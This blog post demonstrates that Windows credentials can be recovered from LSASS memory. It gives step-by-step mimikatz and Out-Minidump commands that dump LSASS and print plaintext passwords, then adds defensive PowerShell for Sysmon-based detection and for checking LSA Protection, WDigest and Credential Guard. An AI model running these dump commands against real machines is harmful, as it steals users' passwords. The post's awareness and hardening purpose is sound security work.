Windows password vulnerability: Hackable in 5 minutes

I came across this Windows password vulnerability, as mentioned in this article. So, I tried to reproduce the steps to see if the vulnerability is still there, and the result really shocked me.

Yep, even in Windows 10, the method still works nicely. The method is not new at all. So, let me show you how to reproduce it using a simple exploitation tool and a PowerShell script. Anyone can do this if you leave your Windows machine unlocked. I’m not going to explain the details; let’s go straight to the steps.

Getting started

First, you need to download the tool called mimikatz (just get the binary package) and the PowerShell script Out-Minidump.ps1 by Matthew Graeber. Let’s start!

Using PowerShell to perform memory dump

To perform the LSASS dump, we will use the PowerShell script Out-Minidump.ps1. The flow of cmdlets will look like this:

Image: PowerShell cmdlet
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# "dot sourcing" method to import function from the script

Get-Process lsass | Out-Minidump
# To perform the LSASS dump

Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# Copy the dump file to desired location
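From the defender's side, the interesting event in the steps above is not the file copy but the moment a user process opens a handle to lsass.exe with memory-read rights, which is exactly what any minidump needs. The following PowerShell is an added example, not code from the original post or from the Out-Minidump project: it triages records shaped like Sysmon Event ID 10 (ProcessAccess) and flags LSASS handles that carry PROCESS_VM_READ from a source outside a small allow-list. The function name Test-LsassAccess, the $AllowedSources list and the $SampleEvents records are all my own constructions for this example; tune the allow-list to your own fleet.

```powershell
# Added example (not from the original post): flag Sysmon Event ID 10
# records where a process opened lsass.exe with memory-read rights.

# Win32 process access rights relevant to a memory dump
$PROCESS_VM_READ           = 0x0010
$PROCESS_QUERY_INFORMATION = 0x0400

# Sources that routinely open LSASS on many hosts (assumption; adjust per fleet)
$AllowedSources = @(
    'C:\Windows\System32\csrss.exe',
    'C:\Windows\System32\wininit.exe',
    'C:\Windows\System32\svchost.exe'
)

function Test-LsassAccess {
    param(
        [Parameter(Mandatory)] [string] $SourceImage,
        [Parameter(Mandatory)] [string] $TargetImage,
        [Parameter(Mandatory)] [string] $GrantedAccess   # hex string as Sysmon logs it, e.g. 0x1FFFFF
    )
    # Only handles to lsass.exe are of interest
    if ($TargetImage -notlike '*\lsass.exe') { return $false }

    # Convert.ToInt32 with base 16 accepts the leading 0x Sysmon writes
    $mask = [Convert]::ToInt32($GrantedAccess, 16)

    # Writing a minidump requires reading the target's memory
    $canRead = ($mask -band $PROCESS_VM_READ) -ne 0
    $trusted = $AllowedSources -contains $SourceImage
    return ($canRead -and -not $trusted)
}

# Constructed sample records with the three Sysmon 10 fields the check uses
$SampleEvents = @(
    [pscustomobject]@{ SourceImage = 'C:\Windows\System32\svchost.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'
                       GrantedAccess = '0x1000' },
    [pscustomobject]@{ SourceImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       TargetImage = 'C:\Windows\System32\lsass.exe'
                       GrantedAccess = '0x1FFFFF' },
    [pscustomobject]@{ SourceImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       TargetImage = 'C:\Windows\System32\notepad.exe'
                       GrantedAccess = '0x1FFFFF' }
)

$hits = $SampleEvents | Where-Object {
    Test-LsassAccess -SourceImage $_.SourceImage -TargetImage $_.TargetImage -GrantedAccess $_.GrantedAccess
}
$hits | Format-Table SourceImage, TargetImage, GrantedAccess -AutoSize
```

With the constructed records, only the powershell.exe handle to lsass.exe is reported: the svchost.exe handle lacks PROCESS_VM_READ and the third record targets a different process. On a real host the same fields come from the Microsoft-Windows-Sysmon/Operational log (Get-WinEvent with Id 10), where SourceImage, TargetImage and GrantedAccess are entries in the event's XML data.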

Using mimikatz terminal program to view the passwords

As you can see, lsass_868.dmp is the LSASS dump file captured with the PowerShell script in this example. Now it’s time to load the dump file in the mimikatz terminal as follows:

sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
Image: mimikatz MINIDUMP

mimikatz switches to the MINIDUMP file, so now we can view the passwords. Run this command to display all the accounts and passwords available:

sekurlsa::logonPasswords full
Image: mimikatz logonPasswords

Tadaa… Now I can see my actual Microsoft Account username and password in plain text. As you can imagine, most people nowadays still use the same password for almost everything. Too bad. So, I expect you can picture all the consequences of this vulnerability…

The existing vulnerability info

The password is encrypted in memory, but that is of little use because the encryption relies on two basic Win32 functions: LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). Windows stores the encrypted user password in memory rather than a one-way hash, so it can be decrypted back to plain text with LsaUnprotectMemory.
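Because the secret is reversible rather than hashed, the practical defences are to stop unprotected processes from reading LSASS memory at all and to keep reversible credentials out of it. The script below is an added example, not part of the original post: it reports three host settings that bear on this, LSA Protection (RunAsPPL, which runs LSASS as a Protected Process Light), the WDigest UseLogonCredential value (which controls whether WDigest keeps a plaintext credential in LSASS), and whether Credential Guard is running. The function name Get-LsassHardeningStatus is my own; the registry paths, value names and the Win32_DeviceGuard class are real, and the script needs to run in an elevated PowerShell session.

```powershell
# Added example (not from the original post): report whether this host has the
# protections that block or blunt an LSASS memory dump.
function Get-LsassHardeningStatus {
    $lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # RunAsPPL: 1 enables LSA Protection (2 enables it without the UEFI lock on
    # recent Windows 11). Unprotected processes then cannot open LSASS with the
    # rights a minidump needs.
    $runAsPpl = (Get-ItemProperty -Path $lsa -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

    # UseLogonCredential: 1 makes WDigest keep a reversible plaintext credential
    # in LSASS memory; 0, or the value being absent on Windows 8.1 and later,
    # disables that.
    $useLogonCred = (Get-ItemProperty -Path $wdigest -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential

    # Credential Guard isolates the secrets in a VBS-protected process; the value
    # 1 in SecurityServicesRunning means it is active.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and (@($dg.SecurityServicesRunning) -contains 1)

    [pscustomobject]@{
        LsaProtectionEnabled    = ($null -ne $runAsPpl -and $runAsPpl -ge 1)
        WDigestPlaintextEnabled = ($useLogonCred -eq 1)
        CredentialGuardRunning  = [bool]$credGuard
    }
}

Get-LsassHardeningStatus | Format-List
```

A host reporting LsaProtectionEnabled True, WDigestPlaintextEnabled False and CredentialGuardRunning True is in the best position: the walk-up dump described above fails at the handle-open step, and what remains in LSASS memory is no longer the reversible form the article relies on. Locking the screen still matters, since these settings do nothing against someone sitting at an unlocked session who simply uses it.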

The bottom line

You will be safe as long as you always lock your computer when you’re away. This short article is just a reminder to me and anyone else to always be careful in whatever we do, especially with anything to do with our passwords and personal credentials. No system is perfect! So, DON’T EVER LEAVE YOUR COMPUTER UNLOCKED!